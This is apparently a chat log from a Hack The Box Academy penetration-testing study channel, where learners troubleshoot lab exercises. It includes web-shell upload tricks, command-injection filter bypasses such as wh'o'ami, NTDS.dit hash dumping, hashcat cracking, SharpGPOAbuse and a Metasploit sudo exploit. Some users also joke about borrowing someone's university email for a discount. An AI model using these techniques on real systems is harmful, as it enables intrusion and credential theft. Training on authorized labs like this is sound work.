lol my bad, just trying to help
No worries! Thanks for the help. I also didn't type a command to submit the payload. I uploaded the file through an image upload feature and used Burp to allow me to avoid the "you can't upload that type of file in this field" error.
all good, we need more helpers (my shift is 24h) 🤣
from your first post tho, i don't see a port specified
oh did you change the content-type to the answer of the first question?
Yes, that's exactly what I did
in repeater?
I just intercepted the request in the proxy, modified that one parameter, hit forward twice until I saw "vendor uploaded to database" in browser, then turned off intercept
the intercept thing doesn't always work for me try in repeater
what can i use instead of the academy built in workstation
if that also doesn't work shoot me a dm with your burp request
your vm + vpn
In Windows Privilege Escalation, SeTakeOwnershipPrivilege: has anyone been able to build SharpGPOAbuse and run it on the target? I've been able to build it but when I try to run it on the target it crashes
which section are you on?
SeTakeOwnershipPrivilege
Alright, I'll try repeater. I don't think that's the issue, since once I modify the request and forward it, I get a confirmation message in the browser that the file was uploaded, and the webpage looks exactly like it does in the tutorial. I get right up to the point where you're supposed to be able to navigate to the url to access the webshell and then get a 404 error.
no idea why I couldn't search for this in my notes, but the section mentions the tool once and has nothing else about it, so if a tool isn't intended for the section there isn't much help on the troubleshooting part
also, did you run it on your VM to confirm that you compiled it right? also found a binary online, maybe give this a try https://github.com/byronkg/SharpGPOAbuse/tree/main/SharpGPOAbuse-master
my own vm or does hack the box have one?
yes but it isn't free
also, just noticed: did you name your payload vendor.connect.php? because the default name is webshell.php
Oh, that could definitely be the issue. Let me try that!
Hello everyone, do you guys know how to properly double pivot with ligolo-ng?
and you are right, if you can confirm that the payload has been uploaded then there is no point in using Repeater, but I just don't trust the intercept
what can i use for free?
I did make a quick "section" on that, want to give it a quick read and maybe some feedback?
read the Pwnbox TOS or help guide
yes but on the academy 2h / day and on the main platform 2h / life
- have this on
kali <-> 172.16.5.15 - using
agent.exe -connect 172.16.5.15:10011 -ignore-cert on 172.16.5.35, but getting this error:
@vital adder would love that !!
created with --tcp btw
that look like some verbose bs i get everytime i run nmap or something
weird, seems like nothing is running here
wheres that
Got the web shell! I hadn't named the file properly. Thanks a ton. You really helped me out.
np ❤️
The instructions at the end of the section question say to leverage SeTakeOwnershipPrivilege rights to get the flag. None of the users on the target have SeTakeOwnershipPrivilege.
The module notes say "Suppose we encounter a user with this privilege or assign it to them through an attack such as GPO abuse using SharpGPOAbuse". In the Windows Privilege Escalation course, in the SeTakeOwnershipPrivilege section, the instructions say to use SharpGPOAbuse to acquire the privileges necessary to access the directory containing the flag.
However SharpGPOAbuse.exe is not one of the programs included in C:/Tools on the target.
I tried building SharpGPOAbuse.exe myself however when I run it on the target I get the error Unhandled Exception: System.MissingMethodException: Method not found: 'Void System.Threading.Monitor.Enter(System.Object, Boolean ByRef)'.
at SharpGPOAbuse.Program.Main(String[] args).
ah finalyyyy 
https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox
https://academy.hackthebox.com/faq
I have a problem: I'm doing the first instance but I ran out of spawns. Do I have to wait 24hrs to get another, or can I do something?
Congrats that's huge. What you gonna do now?
that's a money problem 🤣 jk but you can just use your own vm
Btw question for you. How much HTML and JavaScript should I know before attempting this path?
should i spend my money....? yeah, i will spend it i wanna learn
I’m on Linux module it’s asking the name of the interface that mtu is set to 1500
so for the tool error part, I think that's because of a compiling issue, and for the part about the user that doesn't have that privilege, the section shows you a script that enables it; use that script to add the privilege to the given user first
I'm convinced it's eth0 but it's telling me I'm wrong
Left out with few modules for completing CPTS path , will go for it then gonna enroll for oscp
yeah, the thing isn't free, but if you want it to be, use your own stuff 🤣
I would say that course teaches you the HTML, CSS and JS basics so that you can understand how things are working, but the ending module requires you to have knowledge about Python and PHP scripting, which is where I got stuck
Ahh okay. Will you do the CBBH and CPTS exams? Or straight to OSCP?
OSCP --> CPTS --> CBBH (maybe)
Why not CPTS before OSCP? Because I heard that CPTS is harder and so it will prepare you for OSCP
if you wanna do the modules, yes it is useful, it is used to unlock the modules
I feel like I need more practice for CPTS
nmap
the offshore prolab is the best for that
is he asking for switches?
I would do all the resources on HTB before doing the OSCP. Because you are gonna pay a lot and if you're not ready then it will be a waste of money
Like the CPTS course and exam, and the pro labs, and the OSCP HTB boxes
is silver worth getting?
Include --open to skip closed ports
nmap -T 4 -sV <ip>
You can do all modules up to Tier II with it.
Yes, if you want to do all these modules, this subscription is worth it.
yep thats why going for oscp
with questions like that I have no clue 🤣
taking CPTS path as pre-workout for oscp
Also the Pro labs and the HTB boxes that are similar to OSCP will prepare you to the maximum
can i do all tiers with silver?
it should be the other way around, but 1.5K isn't the price for a pre-workout course 🤣
No, only until Tier II
cant i do that free?
lol yeah, i wish CPTS get its deserving recognition faster
yep i have offshore and cybernetics
Tier 0 is free
I have a question about HTB Academy. When you start a module, it says that at the end of it we will get +X buckets (for example +10 buckets), but I didn't get any extra buckets! Is it normal?
I'm a skilled Full-Stack developer with 6+years of experience
I'm passionate about creating visually stunning, user-friendly websites that help my clients stand out digitally.
If you're looking for a talented and experienced developer, look no further than me!
WEBSITE DEVELOPMENT:
-MERN Stack
-Laravel
-PHP
-Vue.js
-HTML/CSS
-Python
not the right place for this
??
okk okk ok ok
and, is there a way to get stuff for free?
yeah.. NO
I would suggest that a university domain ID is useful
I'm not a dev but that isn't a whole lot of knowledge for 6+ years 🤣
only if he's a student
How does the Cubes system work?
Cubes are our awesome currency! It might take it a bit to understand how it all works, but here is a summary:
Cubes are used to unlock Modules & Paths.
You get back Cubes as a reward for Module & Paths completion. It is like cash back, but better!
The Cubes needed to unlock and reward back depend on the Tier of the Module. Find a table below for reference.
Module Tiers   Unlock With   Reward Back
Tier 0         10            10 (Free!)
Tier I         50            10
Tier II        100           20
Tier III       500           100
Tier IV        1,000         200
||steal someone id||
hi
I didn't understand well!
for example I complete the "Introduction to Academy" module
but I didn't get +10 buckets as a reward
I only got back the 10 buckets I spent at the end of the module (cash back)
is it normal?
what's the point of Silver annual if Silver monthly is cheaper?
ah, the green colour looks amazing. Motivates me to reach Pro rank
Yes, that's why the module is free.
You pay 10 cubes and get 10 cubes back.
and
we can learn all of the modules step-by-step with this system
without any extra payment. yes ?
Annual gives you all modules up to Tier 2 and an exam voucher
Only Tier 0 Modules
so just the exam voucher then?
it isn't that hard if you play the seasons and forget about it (I didn't know I got the rank for like months)
so in the Tier I
if i spent 50 cubes
i will get back just 10 Cubes
not 50+10 cubes
right ?
yes
From Tier I you get 20% of the costs back.
it's bad, man!!!
I thought all of the modules were free 😢
Nobody works for free
how many machines ?
I mean, how much you pay for what is on the billing page; you can just read it and ask here if you have further questions about it
yes i know
but i thought it's free here
no clue like i said didn't know i got the rank
All Tier 0 Modules are free
yes
thanks for answers
it says direct access to job role paths
what's that?
and is there any other way to get them?
nope
both job paths are just a list of modules and all of them are <= Tier 2
so paying for modules up to Tier 2 will give you access to both paths
also you don't get 3 guys asking for free stuff on the academy every single day 🤣
so Silver monthly will get me it, ok
Silver monthly isn't going to get you modules up to Tier 2
what does, because none of them says it does except for Student and Annual
Learn about the different Academy subscriptions.
only Student and Silver Annual subscriptions will get you modules up to Tier 2, and only Silver Annual will throw in an exam voucher
yes, it will be very helpful
if you are looking for it here then you won't find any but the 👢
lol
Is anyone starting Penetration Tester Path?
i've done both path need help with something?
wait, is it about American uni or UK uni? because I know it works differently
any uni
I need a study group because I cannot seem to focus alone hahah
why ?
saw him get yeeted when i was checking my rank
Hi, that script, EnableAllTokenPrivs.ps1, only works if the user already has SeTakeOwnershipPrivilege but it is disabled
PS C:\htb> whoami /priv
PRIVILEGES INFORMATION
Privilege Name Description State
============================= ======================================================= ========
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\htb-student>
On the target the user doesn't have SeTakeOwnershipPrivilege at all.
and a quick search for his old dm here show nothing
gonna borrow someone's uni email to use fr, need to find someone
not from here stinky
mod and admin can't do anything if you do it IRL but just don't spam here for that
yes, maybe saying that can also cause you to get into trouble
also the previous tool works fine for me
nuh uh
something like your acount will be yeeted after paying would be fun 🤣
plus i said borrow no harm no foul
it's against tos not the us legal system
Where did you get SharpGPOAbuse.exe?
While I'm using the ffuf tool for more directories or files, it was showing like this
the link I sent you previously
if you are trying to send a screenshot verify your account first
Anyone experiencing any problem with the first RDP session in the Active Directory introduction module?
if waiting doesn't work and you still have issues while using tools like xfreerdp or remmina, verify your account and send a screenshot of the issue you are having here
thx I am going to reset and wait
@obsidian crag read #welcome and #rules after that use /verify at #bot-commands to verify your account
I don't know what's more impressive, the fact that you've done 100% of the modules or that somehow you got 3 cubes 🤣 but congratz though 🎉
Anyone know where I can find the working laZagne.py from this module for linux? - https://academy.hackthebox.com/module/147/section/1320 I found this - https://github.com/AlessandroZ/LaZagne/blob/master/Linux/laZagne.py but when I run it it can't find the lazagne module
Congrats 🎉 🥳
via RDP you can use the /drive: option
EDIT: looks like you did it already, but why doesn't it work? I had no problem using it
you can always use a python simple server in case
dm you
Your version didn't work either?
did you use python2.7?
yes
it can't find the module which isn't in the github repo
You need to set up pyenv with the latest version of Kali; I have Python 2 set as my system default
In December of 2019 we released a blog post talking about how we will deal with Python 2's End-of-Life. Since then there has been quite a lot of tools that users use that have not been ported to Python 3, causing issues when they try to use them. This page will cover a way of using the deprecated version in a safe way.
but when I run the script -
nm, I needed to clone the whole GitHub repo; there are other classes and modules in the Linux folder. The script won't run by itself without the other files.
Yes but I need it for the future also
the script is stand alone you don't need other files for this script to run
try a new vpn maybe
hmm, it magically works now -
magically it isn't working for me now 🤣
How does it know where to import a custom library per the from statements. Those are in the folder within the github repo
How y’all Mf doin that
I'm not the best at Python, but judging by the fact that this script can run locally without internet, everything should be loaded locally
What’s up with the eu servers?
at least the second set of 4 import commands from the script look like normal libraries, if those libraries are installed
Thx
How did U find that IP?
changed to a US one but nothing
still the same problem
at the moment there is some issue with the VPN server on the main platform, but I have no idea if this is even related to any of the academy stuff, let alone your case
nothing seems to be wrong here, so I think you should reach out to support
ok thx
How can i verify my email ?
Thats the goal
is anyone able to clone git repos to https://academy.hackthebox.com/module/147/section/1320
the password attacks question to get Wills password?
the targets are not connected to the internet
Okay so I have to transfer any tools to or move files back to my machine if I want to firefox_decrypt or run Lazgane on the target?
if you want to transfer tools, you will have to download them to your workstation and then use python3, scp or any other means
thanks, coming from the PWK course I haven't heard of or used some of these tools
Module: ATTACKING COMMON SERVICES
Section: Attacking FTP
Question: What username is available for the FTP server?
Okay. I'm running Hydra against the appropriate port on the host using the provided username and password lists. Hydra yields a single usable user:pw that I can access FTP with. However, it doesn't accept the username as an answer for the question. Any ideas?
hi, this is supposed to be super easy but I don't get what I am doing wrong:
https://academy.hackthebox.com/module/109/section/1035
I am trying all the formats and URL encoding. I know the answer but why does it keep saying invalid input?
and you know what's crazy, the answer is capitalized for both words, and in the question it's not, it's ridiculous
no luck finding a uni email to use yet
and you won't have any luck finding it here
so do you need help with this?
please
I dont understand
can I type the answer here?
the answer is one of the things listed in the question: Which of (new-line, &, |)
if spoiler then nope
Negative. That was the first thing I tried before running Hydra. No dice.
yea ||ftp|| for this isn't on the normal port
For Attacking Enterprise Networks as "practice", do I just scroll to the bottom, start the VM and then dont look at the module again until I got the DC compromised?
if you want to send me that for some reason shoot me a dm i guess
more like the whole network, but basically yes
yea but how do I know Im done lol, thats why I went with DC compromise
Wow the Password Attacks module is the first that frustrated me a little. I think I am going to use the attack machine going forward instead of Kali. Was having python issues with that firefox_decrypt.py tool
enum more i guess if you are out of target then you are probably done
heh I guess
hello, I am stuck in "Capture the NTDS.dit file and dump the hashes. Use the techniques taught in this section to crack Jennifer Stapleton's password. Submit her clear-text password as the answer. (Format: Case-Sensitive)" in the module https://academy.hackthebox.com/module/147/section/1326#questionsDiv. I got the NTDS.dit file but I don't know how to dump the hashes from NTDS.dit. The reason is that impacket just works for the HKLM SECURITY, SYSTEM and SAM hives; on the other hand we have pypykatz, which did not work for me. I am thinking that pypykatz is exclusive to LSASS dumps. Any hint?
I wanted to try it with the NTDS.dit file dump method for practice. I know that crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds might work
impacket should work with ntds if you also provide system
@tranquil axle but do i have to always provide both ?
so NTDS.dit is useless alone am i right ?
seems like you always need both, but if you can get ntds you should be able to get system just as easy
thanks ❤️ @tranquil axle have a good day
@winter blaze the reason is because the hashes inside ntds.dit are encrypted with a PEK key. Now the PEK key is embedded inside ntds.dit but is itself encrypted with the system key. Hence needing the system hive in order to extract the hashes
I previously posted some information on dumping AD database credentials before in a couple of posts: "How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller" and "Attack Methods for Gaining Domain Admin Rights in Active Directory". This post covers many different ways that an attacker can dump credentials from Activ...
O.O THANK YOU SO MUCH i really appreciate it
https://academy.hackthebox.com/module/147/section/1319 - I am struggling with this module. I used the supplied resources with -r ||custom.rule||. Here is the syntax I have used after ||I unshadowed the two .bak files locally||: ||hashcat -m 1800 -a 0 unshadowed.hashes mut_password.list -o cracked.txt -r custom.rule||. I've also tried the ||best64|| rule and the rockyou.txt, ||mut_password.list, and password.list|| word lists in the resources. I can't figure out the root password. When using the rockyou wordlist with custom.rule or best64, ||hashcat|| never cracks that ||SHA-512 hash||, nor does it exhaust. DM anyone so I don't spoil the answer? Am I on the right track?
You are supposed to use the resources, that far I can remember @echo roost
just the resources? no mutate?
hi, when inserting quotes into a command for a command injection, why is there no single quote between the A and M?
oh they mean even as in even and odd
Yeah, it doesn't need to alternate, the goal is to break up any filter that's looking for the word "whoami"
so you should even just do wh'o'ami, and that might work depending on how the server is written
I am currently completing Using Web Proxies, Proxying Tools. I am trying to edit the /etc/proxychains.conf file but it is read only, can anyone help?
For [Attacking Thick Client Applications] in module Attacking Common Applications, I don't understand the reason behind dumping the type of [MAP] and privilege set to [RW], could someone discuss with me?
Hey
is there a way I can reset my progress on a module?
I want to continue a module I started months ago
So I forgot I output the cracked hashes to a file and didn't take out the users. It cracked like 20 minutes ago lol 
thank you @rustic sage
tbh those two sections discussing thick client applications, i haven't found relevant material that might explain what's happening or why, it's just a walkthrough through the example.
if u found any please tag me along, i would like to know as well.
can I ask another question about command injections?
Don't ask to ask , just make the question
I only know that he's trying to find out what the programming language is, but the question is, why did he choose to dump that part of memory? Are type [MAP] and privilege [RW] the only part of memory that has sensitive data?
why does {IFS}c'a't work but not {c'a't}? In the module, the command {ls,la} worked..
try it on your own command line
i don't think he's tryna figure out the programming language
easiest way to test anything
here's what i dug up from IBM:
Memory mapped files provide a mechanism for a process to access files by directly incorporating file data into the process address space. The use of mapped files can significantly reduce I/O data movement since the file data does not have to be copied into process data buffers, as is done by the read and write subroutines.
The speed at which application instructions are processed on a system is proportionate to the number of access operations required to obtain data outside of program-addressable memory.
So if I understood that correctly, the only memory that might get written to a file is a MAP memory with RW permissions, so we're trying to catch what's getting written into the file not figure out what it's language.
correct me if im wrong, i just learned this xD
Yeah, I agree with your idea
but as for the programming language and file type, it's explained in the next paragraph where we look at the magic bytes of the file we intercepted.
But also doesn't the tutorial find out that that part of memory is the executable because of the magic bytes MZ in the ASCII column, which indicate that the file is a DOS MZ executable?
now I am even more confused
yes yes, but that's after dumping it based on the assumption that there might be credentials or sensitive data in it.
- Maybe [MAP] and [RW] means it probably has some data.
- Look into the memory, find the magic bytes header, meaning it's the start of the executable
- Dump the memory and analyze further
this is my logic
Wait, we already know it's data, and that it's being written to a file.
That's because Memory-mapped files allow applications to access large files without having to read or write the entire file into memory at once. Instead, the file is mapped to a region of memory that the application can read and write as if it were a regular buffer in memory.
//Direct quote from the section.
and we know it's being written hence the RW permissions.
And after that as u said.
^^

r u using bash or zsh?
i remember it differs sometimes, correct me if I'm wrong.
I'll test it out one sec
zsh
oh, check it with bash
yeah doesn't work in zsh
hoping this won't happen in the CPTS exam.. I'm really bad at this stuff
i hope so as well xD
Are you going to take the exam? I'm probably in a week
yes yes, i have got windows priv esc, documentation and the final module.
But I'm working on the windows CL to further understand how to navigate and look around.
I'm thinking of also taking the bloodhound module and practice a bit on a C2 framework.
learning a C2 framework might not be a bad idea to help manage shell sessions
and i'll try to knock up Dante prolab first then take the exam, so i still have a bit left to do.
also good practice for when you eventually start to dabble in red team and maldev
yes yes, I wanna get into red teaming eventually, that's why.
not rly, unless u need it
Up to you, more important to understand what you're using and how it works
and also how that relates to what other people are using
Okay, I've done dante and half of zephyr, but I've been lazy for about a month doing nothing, so I'm reviewing all the modules again now, with the last 3 modules left.
nice nice, u got this.
Best of luck when u take the exam.
I think msf is good enough for the exam, it always has some feature you don't know before
Yeah, keep it up
yes yes, I've been playing around with Empire, but i think ima switch that and try sth else.
ty ty
so {ls,-la} works but {cat} doesn't. I don't get why
Here it is with bash:
^^
if u try to dissect the command I think this is what happens:
{cat} --> {cat}
while:
{cat,} --> cat (Space)
Which corresponds to the command itself.
wdym
well it expands the command, it doesn't rly replace it.
When we specify curly brackets we are specifying a list in bash, which in turn expands its elements when run.
Thus creating spaces between its elements.
but when it's a command it gets interpreted as one.
wow nice
ty ty
omg that makes so much sense
if u try to achieve the same thing with zsh, u can make an array, but you will have to use the IFS variable.
I see you are close to taking the exam, do you think if you can pass this, you can pass the OSCP?
because I paid for the OSCP but I am using this to study
i don't rly know tbh, u gotta ask someone who took both. head over to the #cpts section. I think u might find ur answer there
ok ty
from everything I've heard in the past 2-3 years of hearing about these certs, everything you need to pass OSCP is in the OSCP. Likewise, everything you need to pass the CPTS is in the CPTS.
Fundamental information about system administration and operating systems is generally assumed, though
Has anyone done the Session Hijacking topic in Cross Site Scripting module? i cannot grab the admin cookie and I dont know why it is not working :/
Just to correct the info I provided, u can't use the array without spaces, u gotta use spaces even if u used the IFS variable,
That's to embed commands, not like a normal array.
jk, just sleep deprived
Are we supposed to be creating the mutated password list based on mutating the password.list provided with the custom.rule provided? If so I'm getting 186,850 lines. Running through crackmapexec throws some random logging errors in the middle and running in hydra has been going for about half an hour now with no hits yet.
Anyone assist me with Module: Using Metasploit Framework, Section: Sessions? I have a meterpreter session that I've sent to background and am attempting to run the second exploit to get root access, but it keeps failing with:
[-] Exploit failed: Input/output error @ io_fread - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/metasploit_payloads-mettle-1.0.20/build/x86_64-linux-musl/bin/mettle.bin
are you using the correct second exploit?
||sudo_baron_samedit||
I believe so.
and you entered the session in the options?
yep
